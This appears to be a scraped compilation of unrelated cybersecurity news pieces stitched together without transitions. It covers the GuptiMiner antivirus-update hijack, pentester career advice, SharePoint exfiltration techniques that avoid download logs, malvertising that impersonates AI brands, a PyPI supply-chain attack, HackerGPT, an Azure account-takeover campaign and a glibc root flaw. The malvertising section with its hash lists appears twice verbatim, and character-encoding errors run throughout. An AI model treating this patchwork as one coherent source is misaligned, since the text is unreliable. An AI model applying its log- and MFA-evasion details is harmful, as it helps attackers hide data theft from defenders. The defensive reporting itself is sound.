A malware campaign has been exploiting the updating mechanism of the eScan antivirus to distribute backdoors and cryptocurrency miners.
Avast researchers discovered and analyzed a malware campaign that exploited the update mechanism of the eScan antivirus to distribute backdoors and crypto miners.
Threat actors employed two different types of backdoors and targeted large corporate networks
The researchers believe the campaign could be attributed to North Korea-linked AP Kimsuky. The final payload distributed by GuptiMiner was also XMRig.
âGuptiMiner is a highly sophisticated threat that uses an interesting infection chain along with a couple of techniques that include performing DNS requests to the attackerâs DNS servers, performing sideloading, extracting payloads from innocent-looking images, signing its payloads with a custom trusted root anchor certification authority, among others.â reads the analysis published by Avast.âThe main objective of GuptiMiner is to distribute backdoors within big corporate networks.â
The threat actors behind this campaign exploited a vulnerability in the update mechanism of the Indian antivirus provider eScan that allowed them to carry out a man-in-the-middle attack to distribute the malware. Avast already reported the issue to eScan and the India CERT. eScan acknowledged the flaw and addressed it on July 31, 2023. The issue in the update mechanism was present for at least five years.
The infection process begins when eScan requests an update from the update server. However, the attackers carry out a MitM attack and replace the legitimate update package with a malicious one. Subsequently, eScan unpacks and installs the package, which results in the sideloading of a DLL by eScanâs clean binaries. This DLL facilitates the continuation of the process, leading to the execution of multiple shellcodes and intermediary PE loaders.
The researchers noticed that the downloaded package file is replaced with a malware-laced one on the wire because the process doesnât use an HTTPS connection.
Below the infection chain described by Avast:
The eScan updater triggers the update
The downloaded package file is replaced with a malicious one on the wire because of a missing HTTPS encryption (MitM is performed)
A malicious package updll62.dlz is downloaded and unpacked by eScan updater
The contents of the package contain a malicious DLL (usually called version.dll) that is sideloaded by eScan. Because of the sideloading, the DLL runs with the same privileges as the source process â eScan â and it is loaded next time eScan runs, usually after a system restart
If a mutex is not present in the system (depends on the version, e.g. Mutex_ONLY_ME_V1), the malware searches for services.exe process and injects its next stage into the first one it can find
Cleanup is performed, removing the update package
GuptiMiner operates its own DNS servers to provide legitimate destination domain addresses of C2 servers through DNS TXT responses.
GuptiMiner connects directly to malicious DNS servers, bypassing the DNS network entirely. This use of the DNS protocol resembles telnet and is not considered DNS spoofing, which typically occurs within the DNS network. Although the servers requested by GuptiMiner exist, itâs likely an evasion tactic.
In the second-stage the shellcode from the PNG file extracts and executes the Gzip loader. This loader is a simple PE that decompresses another shellcode using Gzip and executes it in a separate thread that kiads the Stage 3 malware Puppeteer.
Puppeteer orchestrates the core functionality of the malware, including the cryptocurrency mining as well as the backdoor deployment.
Surprisingly, the ultimate payload disseminated by GuptiMiner can be also XMRig, which was somewhat unexpected given the level of sophistication of this campaign.
The researchers speculate that using the miner could be a diversionary tactic.
âDuring our research, weâve also found an information stealer which holds a rather similar PDB path as was used across the whole GuptiMiner campaign.â concludes the report. âWhat is truly interesting, however, is that this information stealer might come from Kimsuky operations.â
Security analysis of web applications is, first of all, a search and investigation of cases of incorrect functioning of program code and vulnerabilities. Those who choose a penetration testerâs profession should keep in mind that it requires continuous learning and the ability to use a library of resources for self-education. A common situation is that while you are studying vulnerabilities in one framework, a dozen new reports are published. To quickly understand the potential vulnerabilities associated with previously unknown technologies, you need to be well-versed in the sources of information. When working in a team on an actual pentest project, there is usually no time for a thoughtful search. So, if your skills are combined with a strong foundational education, you are looking at promising career opportunities.
Your initial understanding of the subject can be developed through cybersecurity analysis courses at the university. These courses can also help you decide if this career path is right for you. It is good to receive foundational training in software development and networking, including web applications, while you are at university. Afterward, you can gain hands-on experience by practicing infrastructure penetration testing.
Usually, your initial attempts to secure a job as a web penetration tester might reveal gaps in your knowledge. Seeking employment at companies like VentureDive, where the work could help fill these educational gaps and offer valuable experience, is a smart approach. For instance, you could start as a technical support specialist in information security at a large company. After about two to four months, you might go for your first interview for a security analyst position, during which you could identify any weak points you might still have. With a few more months of work under the guidance of a mentor and diving into training materials, you could successfully land a position as a penetration tester.
Choosing where to work in the future is not as straightforward as it may appear. In a large, well-known company, you will be surrounded by a high level of expertise and likely assigned a mentor. However, the opportunity to find truly interesting vulnerabilities in real projects might be limited. This is because such organizations often have costly services, and their clients are usually not willing to skimp on development and security. Consequently, you will be working with quality products that have undergone thorough security testing, reducing the likelihood of encountering situations that provide valuable experience.
In a small company, you should not expect to find a mentor, a high level of expertise, or an impressive salary. However, these companies often get orders to pentest applications with many vulnerabilities, providing invaluable experience for those new to the profession. With this experience under your belt, you could eventually transition to a larger company.
Mastering Interview Techniques
Given that we cannot cover everything, letâs go over the essential knowledge and skills you need to analyze vulnerabilities in web applications.
A pentester needs to understand how applications function on the network level, which includes knowing about TCP handshakes, domain names, IPs, proxies, etc. It is also important to grasp the basics of how HTTP and HTTPS protocols work. Being prepared to answer questions like âWhat is the difference between HTTP methods?â âWhen should PATCH be used as opposed to POST?â and âHow do HTTP 0.9/1.1 differ from HTTP/2?â is a part of this foundational knowledge.
Vulnerabilities are not always tucked away in a web applicationâs code; sometimes, they are embedded in its architecture, like within the web server itself. Often, a pentester might not have a direct view of the applicationâs architecture but can infer how it functions. Therefore, having knowledge in this area is incredibly useful.
As vulnerabilities become more complex, it is important to grasp the basics. This foundational understanding allows you to tackle more complex issues as they arise.
Developing the ability to search for answers to your questions using open sources is vital, even if you have someone to ask. Always start by seeking out information and attempting to solve problems on your own before seeking help.
Being able to write and read code in various languages, including PHP, Python, JavaScript, Java, and C#, is essential. When it comes to analyzing web applications, you will encounter different approaches, such as white box, gray box, and black box testing. For example, if you are doing white box testing and have access to the applicationâs source code, having development experience is a big plus. Additionally, the ability to write automation scripts and tailor third-party tools to fit your needs is a valuable skill.
Pentest projects frequently require examining the application from the outside in. You need the ability to scan the network and identify vulnerable services to ensure no obvious security flaws are overlooked.
In your work, you will often need to theoretically explain the nature of a vulnerability. This requires understanding basic concepts, such as how databases operate, the properties of information, and what constitutes vulnerability and exploitation. Essential skills also include system administration for both Windows and Linux.
Simply studying a vast number of vulnerabilities will turn you into a top-tier professional because it does not cultivate the skill of discovering them. During actual pentest projects, the toughest part is often identifying vulnerabilities. It is advised to search for vulnerable applications and analyze them without peeking at the technology stack or hints about the vulnerabilities. This practice offers foundational experience and insights into how things operate in an actual project.
For those lacking a basic education in security analysis, paid penetration testing courses are an option to consider. Unfortunately, the better courses tend to be expensive, and it is difficult to recommend any budget-friendly options that are truly effective. It is crucial to realize that these courses will not turn you into an expert overnight, as some might claim, but they will provide you with a solid understanding of the profession.
Two new techniques uncovered in SharePoint enable malicious actors to bypass traditional security measures and exfiltrate sensitive data without triggering standard detection mechanisms.
Illicit file downloads can be disguised as harmless activities, making it difficult for cybersecurity defenses to detect them. To accomplish this, the systemâs features are manipulated in various ways.
Security researchers from Varonis Threat Labs discovered two SharePoint techniques.
Open-In-App Method
The first technique dubbed the âOpen in App Method,â takes advantage of the SharePoint feature, which allows users to open documents directly in their associated applications.
While this feature is designed for user convenience, it has inadvertently created a loophole for data breaches.
Attackers can use this featureâs underlying code to access and download files, leaving behind only an access event in the fileâs audit log.
This subtle footprint can easily be overlooked, as it does not resemble a typical download event.
The exploitation of this method can be carried out manually or automated through a PowerShell script.
When automated, the script can rapidly exfiltrate many files, significantly amplifying the potential damage.
The script leverages the SharePoint client object model (CSOM) to fetch files from the cloud and save them to a local computer, avoiding creating a download log entry.
SkyDriveSync User-Agent
The second technique involves the manipulation of the User-Agent string for Microsoft SkyDriveSync, now known as OneDrive, Varonis said.
By masquerading as the sync client, attackers can download files or even entire SharePoint sites.
These downloads are mislabeled as file synchronization events rather than actual downloads, thus slipping past security measures that are designed to detect and log file downloads.
This method is particularly insidious because it can be used to exfiltrate data on a massive scale, and the sync disguise makes it even harder for security tools to distinguish between legitimate and malicious activities.
The use of this technique suggests a sophisticated understanding of SharePoint and OneDriveâs synchronization mechanisms, which could be exploited to systematically drain data from an organization without raising alarms.
Microsoftâs Response And Security Patch Backlog
Upon discovery, Varonis researchers promptly reported these vulnerabilities to Microsoft in November 2023. Microsoft has acknowledged the issue and categorized these vulnerabilities as âmoderateâ security risks.
They have been added to Microsoftâs patch backlog program, indicating that a fix is in the pipeline but may not be immediately available.
The discovery of these techniques underscores the risks associated with SharePoint and OneDrive, especially when permissions are misconfigured or overly permissive.
Organizations relying on these services for file sharing and collaboration must be vigilant and proactive in managing access rights to minimize the risk of unauthorized data access.
To combat these vulnerabilities, organizations are advised to implement additional detection strategies.
Monitoring for unusual patterns of access events, especially those that could indicate the use of the âOpen in App Method,â is crucial.
Similarly, keeping an eye on sync activities and verifying that they match expected user behavior can help identify misuse of the SkyDriveSync User-Agent technique.
Furthermore, organizations should prioritize the review and tightening of permissions across their SharePoint and OneDrive environments.
Regular audits and updates to security policies can help prevent threat actors from exploiting such vulnerabilities in the first place.
Hackers have been found hijacking Facebook pages to impersonate popular AI brands, thereby injecting malware into the devices of unsuspecting users.
This revelation comes from a detailed investigation by Bitdefender Labs, which has been closely monitoring these malicious campaigns since June 2023.
Recent analyses of malvertising campaigns have revealed a disturbing trend.
Ads are distributing an assortment of malicious software, which poses severe risks to consumersâ devices, data, and identity.
Unwitting interactions with these malware-serving ads could lead to downloading and deploying harmful files, including Rilide Stealer, Vidar Stealer, IceRAT, and Nova Stealer, onto usersâ devices.
Rilide Stealer V4: A Closer Look
Bitdefender Labs has spotlighted an updated version of the Rilide Stealer (V4) lurking within sponsored ad campaigns that impersonate popular AI-based software and photo editors such as Sora, CapCut, Gemini AI, Photo Effects Pro, and CapCut Pro.
This malicious extension, targeting Chromium-based browsers, is designed to monitor browsing history, capture login credentials, and even facilitate the withdrawal of crypto funds by bypassing two-factor authentication through script injections.
Key Updates in Rilide V4:
Targeting of Facebook cookies
Masquerading as a Google Translate Extension
Enhanced obfuscation techniques to conceal the softwareâs true intent
Indicators Of Compromise
Malicious hashes
2d6829e8a2f48fff5348244ce0eaa35bcd4b26eac0f36063b9ff888e664310db â OpenAI Sora official version setup.msi â Sora
a7c07d2c8893c30d766f383be0dd78bc6a5fd578efaea4afc3229cd0610ab0cf â OpenAI Sora Setup.zip â Sora
e394f4192c2a3e01e6c1165ed1a483603b411fd12d417bfb0dc72bd6e18e9e9d â Setup.msi â Sora
021657f82c94511e97771739e550d63600c4d76cef79a686aa44cdca668814e0 â Setup.msi â Sora
92751fd15f4d0b495e2b83d14461d22d6b74beaf51d73d9ae2b86e2232894d7b â Setup.msi â Sora
32a097b510ae830626209206c815bbbed1c36c0d2df7a9d8252909c604a9c1f1 â Setup.msi â Sora
c665ff2206c9d4e50861f493f8e7beca8353b37671d633fe4b6e084c62e58ed9 â Setup.msi â Sora
0ed3b92fda104ac62cc3dc0a5ed0f400c6958d7034e3855cad5474fca253125e â Capcut Pro For PC.setup.msi â Capcut
757855fcd47f843739b9a330f1ecb28d339be41eed4ae25220dc888e57f2ec51 â OpenAI ChatGPT-4.5 Version Free.msi â ChatGPT
3686204361bf6bf8db68fd81e08c91abcbf215844f0119a458c319e92a396ecf â Google Gemini AI Ultra Version Updata.msi â Gemini AI
d60ea266c4e0f0e8d56d98472a91dd5c37e8eeeca13bf53e0381f0affc68e78a â Photo Effects Pro v3.1.3 Setup.msi â Photo Effects
bb7c3b78f2784a7ac3c090331326279476c748087188aeb69f431bbd70ac6407 â Photo Effects Pro v3.1.3 Setup.msi â Photo Effects
0ed3b92fda104ac62cc3dc0a5ed0f400c6958d7034e3855cad5474fca253125e â AISora.setup.msi â Sora
Vidar Stealer: Evolving Threats
Vidar Stealer, another prolific info stealer, is marketed through the same MaaS model via dark web ads, forums, and Telegram groups.
Capable of exfiltrating personal information and crypto from compromised devices, Vidarâs distribution has evolved from spam campaigns and cracked software to malicious Google Search ads and social media platforms, mainly through sponsored ads on Metaâs platform.
Despite its name, IceRAT functions more as a backdoor on compromised devices. It acts as a gateway for secondary infections, such as crypto miners and information stealers that target login credentials and other sensitive data.
Nova Stealer emerges as a highly proficient info stealer with capabilities including password exfiltration, screen recordings, discord injections, and crypto wallet hijacking.
Nova Stealer, offered as MaaS by the threat actor known as Sordeal, represents a significant threat to digital security.
Indicators Of Compromise
Malicious hashes
fb3fbee5372e5050c17f72dbe0eb7b3afd3a57bd034b6c2ac931ad93b695d2d9- Instructions_for_using_today_s_AI.pdf.rar â AI and Life
6a36f1f1821de7f80cc9f8da66e6ce5916ac1c2607df3402b8dd56da8ebcc5e2- Instructions_for_using_today_s_AI.xlsx_rar.rar â AI and Life
fe7e6b41766d91fbc23d31573c75989a2b0f0111c351bed9e2096cc6d747794b- Instructions for using todayâs AI.pdf.exe â AI and Life
ce0e41e907cab657cc7ad460a5f459c27973e9346b5adc8e64272f47026d333d- Instructions for using todayâs AI.xlsx.exe â AI and Life
a214bc2025584af8c38df36b08eb964e561a016722cd383f8877b684bff9e83d- 20 digital marketing tips for 2024.xlsx.exe â Google Digital Marketing
53714612af006b06ca51cc47abf0522f7762ecb1300e5538485662b1c64d6f55 â Premium advertising course registration form from Oxford.exe â Google Digital Marketing
728953a3ebb0c25bcde85fd1a83903c7b4b814f91b39d181f0fc610b243c98d4- New Microsoft Excel Worksheet.exe â Google Digital Marketing
The Midjourney Saga: AIâs Dark Side
The addition of AI tools on the internet, from free offerings and trials to subscription-based services, has not gone unnoticed by cybercriminals.
Midjourney, a leading generative AI tool with a user base exceeding 16 million as of November 2023, has become a favored tool among cyber gangs over the past year, highlighting the intersection of cutting-edge technology and cybercrime.
Indicators Of Compromise
159.89.120.191
159.89.98.241
As the digital landscape continues to evolve, so does the nature of the threats it maintains.
The rise of Malware-as-a-Service represents a significant shift in the cyber threat paradigm that requires vigilant and proactive measures to combat.
Key Updates in Rilide V4:
Targeting of Facebook cookies
Masquerading as a Google Translate Extension
Enhanced obfuscation techniques to conceal the softwareâs true intent
Indicators Of Compromise
Malicious hashes
2d6829e8a2f48fff5348244ce0eaa35bcd4b26eac0f36063b9ff888e664310db â OpenAI Sora official version setup.msi â Sora
a7c07d2c8893c30d766f383be0dd78bc6a5fd578efaea4afc3229cd0610ab0cf â OpenAI Sora Setup.zip â Sora
e394f4192c2a3e01e6c1165ed1a483603b411fd12d417bfb0dc72bd6e18e9e9d â Setup.msi â Sora
021657f82c94511e97771739e550d63600c4d76cef79a686aa44cdca668814e0 â Setup.msi â Sora
92751fd15f4d0b495e2b83d14461d22d6b74beaf51d73d9ae2b86e2232894d7b â Setup.msi â Sora
32a097b510ae830626209206c815bbbed1c36c0d2df7a9d8252909c604a9c1f1 â Setup.msi â Sora
c665ff2206c9d4e50861f493f8e7beca8353b37671d633fe4b6e084c62e58ed9 â Setup.msi â Sora
0ed3b92fda104ac62cc3dc0a5ed0f400c6958d7034e3855cad5474fca253125e â Capcut Pro For PC.setup.msi â Capcut
757855fcd47f843739b9a330f1ecb28d339be41eed4ae25220dc888e57f2ec51 â OpenAI ChatGPT-4.5 Version Free.msi â ChatGPT
3686204361bf6bf8db68fd81e08c91abcbf215844f0119a458c319e92a396ecf â Google Gemini AI Ultra Version Updata.msi â Gemini AI
d60ea266c4e0f0e8d56d98472a91dd5c37e8eeeca13bf53e0381f0affc68e78a â Photo Effects Pro v3.1.3 Setup.msi â Photo Effects
bb7c3b78f2784a7ac3c090331326279476c748087188aeb69f431bbd70ac6407 â Photo Effects Pro v3.1.3 Setup.msi â Photo Effects
0ed3b92fda104ac62cc3dc0a5ed0f400c6958d7034e3855cad5474fca253125e â AISora.setup.msi â Sora
Vidar Stealer: Evolving Threats
Vidar Stealer, another prolific info stealer, is marketed through the same MaaS model via dark web ads, forums, and Telegram groups.
Capable of exfiltrating personal information and crypto from compromised devices, Vidarâs distribution has evolved from spam campaigns and cracked software to malicious Google Search ads and social media platforms, mainly through sponsored ads on Metaâs platform.
Despite its name, IceRAT functions more as a backdoor on compromised devices. It acts as a gateway for secondary infections, such as crypto miners and information stealers that target login credentials and other sensitive data.
Nova Stealer emerges as a highly proficient info stealer with capabilities including password exfiltration, screen recordings, discord injections, and crypto wallet hijacking.
Nova Stealer, offered as MaaS by the threat actor known as Sordeal, represents a significant threat to digital security.
Indicators Of Compromise
Malicious hashes
fb3fbee5372e5050c17f72dbe0eb7b3afd3a57bd034b6c2ac931ad93b695d2d9- Instructions_for_using_today_s_AI.pdf.rar â AI and Life
6a36f1f1821de7f80cc9f8da66e6ce5916ac1c2607df3402b8dd56da8ebcc5e2- Instructions_for_using_today_s_AI.xlsx_rar.rar â AI and Life
fe7e6b41766d91fbc23d31573c75989a2b0f0111c351bed9e2096cc6d747794b- Instructions for using todayâs AI.pdf.exe â AI and Life
ce0e41e907cab657cc7ad460a5f459c27973e9346b5adc8e64272f47026d333d- Instructions for using todayâs AI.xlsx.exe â AI and Life
a214bc2025584af8c38df36b08eb964e561a016722cd383f8877b684bff9e83d- 20 digital marketing tips for 2024.xlsx.exe â Google Digital Marketing
53714612af006b06ca51cc47abf0522f7762ecb1300e5538485662b1c64d6f55 â Premium advertising course registration form from Oxford.exe â Google Digital Marketing
728953a3ebb0c25bcde85fd1a83903c7b4b814f91b39d181f0fc610b243c98d4- New Microsoft Excel Worksheet.exe â Google Digital Marketing
The Midjourney Saga: AIâs Dark Side
The addition of AI tools on the internet, from free offerings and trials to subscription-based services, has not gone unnoticed by cybercriminals.
Midjourney, a leading generative AI tool with a user base exceeding 16 million as of November 2023, has become a favored tool among cyber gangs over the past year, highlighting the intersection of cutting-edge technology and cybercrime.
Indicators Of Compromise
159.89.120.191
159.89.98.241
As the digital landscape continues to evolve, so does the nature of the threats it maintains.
The rise of Malware-as-a-Service represents a significant shift in the cyber threat paradigm that requires vigilant and proactive measures to combat.
Over 170,000 users have fallen victim to a meticulously orchestrated scheme exploiting the Python software supply chain.
The Checkmarx Research team has uncovered a multi-faceted attack campaign that leverages fake Python infrastructure to distribute malware, compromising the security of countless developers and organizations.
This article delves into the attack campaign, its impact on victims, the tactics, techniques, and procedures (TTPs) employed by the threat actors, and the critical findings from Checkmarxâs investigation.
Attack Campaign Description
The core of this malicious campaign revolves around an attackerâs ability to combine several TTPs to launch a silent attack on the software supply chain, specifically targeting the Python ecosystem.
By creating multiple malicious open-source tools with enticing descriptions, the attackers lured victims into their trap, primarily through search engines.
The campaignâs sophistication is evident in distributing a malicious dependency hosted on a fake Python infrastructure, which was then linked to popular projects on GitHuband legitimate Python packages.
A chilling account from Mohammed Dief, a Python developer and one of the campaignâs victims, highlights the stealth and impact of the attack.
Dief encountered a suspicious error message while working on his laptop, the first sign of the compromise, leading to the realization that his system had been hacked.
Victims And Impact
Among the notable victims of this campaign is the Top.gg GitHub organization, a community boasting over 170,000 members.
The attackers managed to hijack GitHub accounts with high reputations, including that of âeditor-syntax,â a maintainer with write permissions to Top.ggâs repositories.
This allowed them to commit malicious acts and increase the visibility and credibility of their malicious repositories.
The attackâs impact is far-reaching, affecting individual developers and larger communities alike.
Social engineering schemes, account takeovers, and malicious packages published on the PyPi registry have underscored the software supply chainâs vulnerability to such sophisticated attacks.
The Checkmarx Research team has uncovered an attack campaign aimed at the software supply chain.
The campaign appears to have successfully exploited multiple victims.
Threat Actors And TTPs
The threat actors behind this campaign demonstrated high sophistication and planning.
They employed a range of TTPs, including:
Account Takeover via Stolen Cookies: The attackers gained access to high-reputation GitHub accounts by stealing session cookies, bypassing the need for passwords.
Publishing Malicious Packages: By setting up a custom Python mirror and publishing malicious packages to the PyPi registry, they could distribute malware under the guise of legitimate software.
Social Engineering: The attackers used social engineering to trick users into downloading malicious dependencies, further spreading the malware.
By deploying a fake Python package mirror and utilizing typosquatting techniques, the attackers could deceive users and systems into downloading poisoned versions of popular packages like âColorama.
âThe malicious payload delivered through these packages is designed to harvest sensitive information, including passwords, credentials, and data from various software applications.
The malware targets web browsers, Discord, cryptocurrency wallets, and Telegram, and even includes a keylogging component to capture victimsâ keystrokes.
The final stage of the malware reveals its data-stealing capabilities, targeting not only personal and financial information but also attempting to gain unauthorized access to victimsâ social media and communication platforms.
This attack campaign highlights the critical vulnerabilities within the software supply chain, particularly in open-source ecosystems like Pythonâs.
The sophistication and success of the attackers in exploiting these vulnerabilities underscore the need for heightened vigilance and robust security practices among developers and organizations.
Through continuous monitoring, collaboration, and information sharing, the cybersecurity community can mitigate risks and protect the integrity of open-source software.
HackerGPT is a cutting-edge AI tool designed explicitly for the cybersecurity sector, particularly beneficial for individuals involved in ethical hacking, such as bug bounty hunters.
This advanced assistant is at the cutting edge of cyber intelligence, offering a vast repository of hacking methods, tools, and tactics. More than a mere repository of information, HackerGPT actively engages with users, aiding them through the complexities of cybersecurity.
There are several ChatGPT-powered tools, such as OSINVGPT, PentestGPT, WormGPT, and BurpGPT, that have already been developed for the cyber security community, and HackerGPT is writing a new chapter for the same.
What is the Purpose of HackerGPT:
It leverages the capabilities of ChatGPT, enhanced with specialized training data, to assist in various cybersecurity tasks, including network and mobile hacking, and understand different hacking tactics without resorting to unethical practices like jailbreaking.
HackerGPT generates responses to user queries in real-time, adhering to ethical guidelines. It supports both GPT-3 and GPT-4 models, providing users with access to a wide range of hacking techniques and methodologies.
The tool is available for use via a web browser, with plans to develop an app version in the future. It offers a 14-day trial with unlimited messages and faster response times.
HackerGPT aims to streamline the hacking process, making it significantly easier for cybersecurity professionals to generate payloads, understand attack vectors, and communicate complex technical results effectively.
This AI-powered assistant is seen as a valuable resource for enhancing security evaluations and facilitating the understanding of potential risks and countermeasures among both technical and non-technical stakeholders
Recently, HackerGPT released 2.0, and the beta is now available here.
Upon posing a query to HackerGPT, the process begins with authentication of the user and management of query allowances, which differ for free and premium users.
The system then probes its extensive database to find the most relevant information to the query. For non-English inquiries, translation is employed to ensure the database search is effective.
If a suitable match is discovered, it is integrated into the AIâs response mechanism. The query is securely transmitted to OpenAI or OpenRouter for processing, ensuring no personal data is included. The response you receive depends on the module in use:
HackerGPT Module: A customized version of Mixtral 8x7B with semantic search capabilities tailored to our database.
GPT-4 Turbo: The most recent innovation from OpenAI, enhanced with our specialized prompts.
Guidelines for Issues: The âIssuesâ section is strictly for problems directly related to the codebase. Weâve noticed an influx of non-codebase-related issues, such as feature requests or cloud provider problems. Please consult the âHelpâ section under the âDiscussionsâ tab for setup-related queries. Issues not pertinent to the codebase are typically closed promptly.
Engagement in Discussions: We strongly encourage active participation in the âDiscussionsâ tab! Itâs an excellent platform for asking questions, exchanging ideas, and seeking assistance. Chances are, others might have the same question if you have a question.
Updating Process: To update your local Chatbot UI repository, navigate to the root directory in your terminal and execute:
npm run update
For hosted instances, youâll also need to run:
npm run db-push
This will apply the latest migrations to your live database.
Setting Up Locally: To set up your own instance of Chatbot UI locally, follow these steps:
Navigate to the root directory of your local Chatbot UI repository and run:
npm install
Install Supabase & Run Locally:
Supabase is chosen for its ease of use, open-source nature, and free tier for hosted instances. It replaces local browser storage, addressing security concerns, storage limitations, and enabling multi-modal use cases.
Install Docker: Necessary for running Supabase locally. Download it for free from the official site.
Install Supabase CLI: Use Homebrew for macOS/Linux or Scoop for Windows.
Start Supabase: Execute supabase start in your terminal at the root of the Chatbot UI repository.
Fill in Secrets: Copy the .env.local.example file to .env.local and populate it with values obtained from supabase status.
Optional Local Model Installation:
For local models, follow the instructions provided for Ollama installation.
Run the App Locally:
Finally, run npm run chat in your terminal. Your local instance should now be accessible at http://localhost:3000.
Setting Up a Hosted Instance:
To deploy your Chatbot UI instance in the cloud, follow the local setup steps here . Then, create a separate repository for your hosted instance and push your code to GitHub.
Set up the backend with Supabase by creating a new project and configuring authentication. Connect to the hosted database and configure the frontend with Vercel, adding necessary environment variables. Deploy, and your hosted Chatbot UI instance should be live and accessible through the Vercel-provided URL. You can read the complete GitHub repository here.
wo flights bound for Israel over the past week have suffered attempts to hijack their communications and divert the aircraft, according to local reports.
The El Al flights were both travelling from Thailand to Israelâs Ben Gurion international airport and apparently encountered âhostile elementsâ while flying over the Middle East.
Citing a report from national broadcaster Kan Reshet B, The Jerusalem Post claimed that hackers attempted to hijack the planesâ communications networks in order to divert them from their pre-programmed route.
No group has claimed responsibility. Although the aircraft were flying over an area in which Iranian-backed Houthis are active, sources have claimed it could be the work of a group operating from Somaliland â an unrecognized state in the Horn of Africa.
Fortunately, the pilots reportedly became suspicious about the sudden change in instructions and ignored them, switching to another communications channel and double-checking their route with air traffic controllers.
An El Al source revealed that pilots are trained to spot and mitigate such threats whilst in the air.
âThe disruption did not affect the normal course of the flight thanks to the professionalism of the pilots who used the alternative means of communication and allowed the flight to continue on the planned route.â
The EUâs aviation safety agency EASA recently revamped its cybersecurity regulations for the sector with the release of the first Easy Access Rules (EAR) for Information Security (Part IS).
Theyâre designed to enforce best practice security across the industry, covering an exhaustive range of suppliers as well as airlines, airports, communication infrastructure providers and air towers.
An ongoing campaign of cloud account takeover has affected hundreds of user accounts, including those of senior executives, and impacted dozens of Microsoft Azure environments.
Threat actors attack users with customized phishing lures inside shared documents as part of this ongoing effort.
Some documents that have been weaponized have embedded links to âView document,â which, when clicked, take users to a malicious phishing webpage to steal sensitive information and commit financial fraud.
Attackers Targeting Wide Range Of Individuals
Threat actors appear to target a broad spectrum of people with varying titles from various organizations, affecting hundreds of users worldwide.
âThe affected user base encompasses a wide spectrum of positions, with frequent targets including Sales Directors, Account Managers, and Finance Managers,â Proofpoint researchers shared with Cyber Security News.
âIndividuals holding executive positions such as âVice President, Operations,â âChief Financial Officer & Treasurerâ and âPresident & CEOâ were also among those targeted.â
Threat actors have a realistic approach, as seen by the variety of positions they have targeted, intending to compromise accounts that have varying degrees of access to important resources and responsibilities across organizational activities.
In this campaign, researchers observed the usage of a particular Linux user agent that attackers employed during the attack chainâs access phase.
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
The âOfficeHomeâ sign-in application is primarily accessed by attackers using this user-agent, along with other native Microsoft365 apps, like:
âOffice365 Shell WCSS-Clientâ (indicative of browser access to Office365 applications)
âOffice 365 Exchange Onlineâ (indicative of post-compromise mailbox abuse, data exfiltration, and email threats proliferation)
âMy Signinsâ (used by attackers for MFA manipulation; for more info about this technique, see our recent Cybersecurity Stop of the Month blog)
âMy Appsâ
âMy Profileâ
Attackers use their own MFA techniques to keep accessing systems permanently. Attackers choose various authentication techniques, such as registering additional phone numbers to authenticate via SMS or phone calls.
Criminals get access to and download confidential data such as user credentials, internal security protocols, and financial assets.
Mailbox access is also used to target individual user accounts with phishing threats and migrate laterally across compromised organizations.
Internal emails are sent to the impacted companiesâ finance and human resources departments to commit financial fraud.
Attackers design specialized obfuscation rules to hide their activities and erase any proof of malicious activity from the inboxes of their victims.
âAttackers were observed employing proxy services to align the apparent geographical origin of unauthorized activities with that of targeted victims, evading geo-fencing policies,â researchers said.
Thus, in your cloud environment, be aware of account takeover (ATO) and possible illegal access to key resources. Security solutions must offer precise and prompt identification of both initial account compromise and post-compromise actions, together with insight into services and applications that have been misused.
The recent discovery of a significant flaw in the GNU C Library (glibc), a fundamental component of major Linux distributions, has raised serious security concerns. This flaw grants attackers root access, posing a critical threat to the security of Linux systems.
Vulnerability in GNU C Library (glibc): The GNU C Library, commonly known as glibc, is an essential part of Linux distributions. It provides the core libraries for the system, including those used for file handling, mathematical computations, and system calls.
Root Access Granted: The flaw discovered in glibc allows attackers to gain full root access to Linux machines. Root access means having complete control over the system, enabling an attacker to perform any action, including installing software, accessing all files, and modifying system configurations.
CVE ID: CVE-2023-6246
Description: This vulnerability is related to a dynamic memory buffer overflow and is classified as a Local Privilege Escalation (LPE) issue. It was found in glibcâs __vsyslog_internal() function, which is called by the widely-used syslog and vsyslog functions.
Impact: The flaw allows unprivileged attackers to gain root access on various major Linux distributions in their default configurations. This level of access can enable attackers to take complete control over the affected system.
Severity: Given its potential for granting root access, this vulnerability is considered highly severe.
HOW THE FLAW WORKS
Local Privilege Escalation: The vulnerability is a local privilege escalation (LPE) issue. This means that an attacker who already has access to the system (even with limited privileges) can exploit this flaw to gain root-level access.
Exploitation Requirements: To exploit this flaw, attackers need a Set-User-ID (SUID) binary. SUID is a special type of file permission that allows users to execute a program with the permissions of the file owner, which in many cases is the root user.
IMPACT AND SEVERITY
Widespread Impact: Given the ubiquitous use of glibc in Linux distributions, the impact of this vulnerability is widespread, affecting a vast number of systems and applications.
High Severity: The flaw is considered high severity due to its potential to grant attackers complete control over the affected systems.
MITIGATION AND RESPONSE
Disabling SUID Binaries: One suggested mitigation is to disable SUID binaries using âno new privilegesâ mode, which can be implemented with tools like systemd or bwrap.
Patch and Update: Users and administrators are urged to apply patches and updates provided by their Linux distribution as soon as they become available. Staying updated is crucial in preventing the exploitation of this vulnerability.
The discovery of the glibc flaw that grants root access to major Linux distributions is a stark reminder of the importance of system security and the need for constant vigilance. Users and administrators must take immediate action to mitigate the risk by applying patches and employing security best practices. As Linux continues to be a backbone for many systems and networks, ensuring its security is paramount for the integrity of countless applications and services.
One of the best ways to stay safe and secure when using your computers and other electronic devices is to be aware of the risks. For the past decade, that’s precisely what I’ve been doing.
Most risks are obvious:Â use strong passwords, don’t download and install software from untrustworthy websites, or hand your unlocked device to a third party.
However, there are less obvious — yet equally dangerous — risks that can result in device or network intrusion, or even device destruction.
Watch out: Some of the most effective and dangerous hacking tools are hard to tell apart from benign devices. They can even be cute.
The cybersecurity field continuously generates new terms and concepts as it evolves with time. It also repurposes words to describe new concepts. Thereâs a never-ending flow of jargon that some refer to as an alphabet soup of complexity. From NGAV to XDR, it appears unlikely for cybersecurity to run out of new acronyms and terminologies.
Meanwhile, some popular terms used in cybersecurity can have contradicting meanings. These are the so-called contronyms, which may add some spice to the insipidity of tech terms. Hereâs a list of some famous cybersecurity words or phrases many would probably think they are already familiar with but are likely to be surprised to learn about their other meanings.
HACKING
Most people tend to equate hacking to cybercrime, an attempt to illegally access, damage, or take over a computer system. This is not surprising given that most news articles that mention hacking use the term in its negative connotation, referring to cyber attacks aimed at bypassing access controls or security measures to prevent the unauthorized use of IT resources.
